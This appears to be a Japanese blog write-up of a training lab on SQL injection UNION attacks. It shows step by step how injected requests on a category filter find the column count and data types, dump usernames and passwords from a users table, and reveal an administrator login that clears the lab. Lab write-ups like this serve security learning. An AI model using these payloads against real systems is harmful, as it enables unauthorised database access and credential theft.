Shikata Ga Nai

Private? There is no such things.

SQL injection UNION attack, retrieving data from other tablesving data from other tablesをやってみた

Hello there, ('ω')ノ

 

SQLインジェクションUNION攻撃で他テーブルからデータの取得を。

 

クエリの結果は、アプリケーションの応答で返されるので。

UNION攻撃を使用して、他テーブルからデータを取得できて。 

まずは、ページに移動してGiftsを選択して。

 

f:id:ThisIsOne:20210222082643p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210222082814p:plain

 

まずは、SELECTできるカラム数の模索を。

 GET /filter?category=Gifts'+UNION+SELECT+NULL--

 

f:id:ThisIsOne:20210222082931p:plain

 

 GET /filter?category=Gifts'+UNION+SELECT+NULL,NULL--

 

f:id:ThisIsOne:20210222083009p:plain

 

次にデータの型の模索を。

 GET /filter?category=Gifts'+UNION+SELECT+'abc',NULL--

 

f:id:ThisIsOne:20210222083100p:plain

 

 GET /filter?category=Gifts'+UNION+SELECT+'abc','xyz'--

 

f:id:ThisIsOne:20210222083320p:plain

 

データベースには、usersテーブルがあって。

usernameとpasswordというカラムがあるとのこで。

3名のデータが抽出できて。

 GET /filter?category=Gifts'+UNION+SELECT+username,password+FROM+users--

 

f:id:ThisIsOne:20210222083710p:plain

 

下記でログインすると。

 administrator/apyqkg0vgsahpr85dokl

 

f:id:ThisIsOne:20210222083956p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210222084015p:plain

 

Best regards, (^^ゞ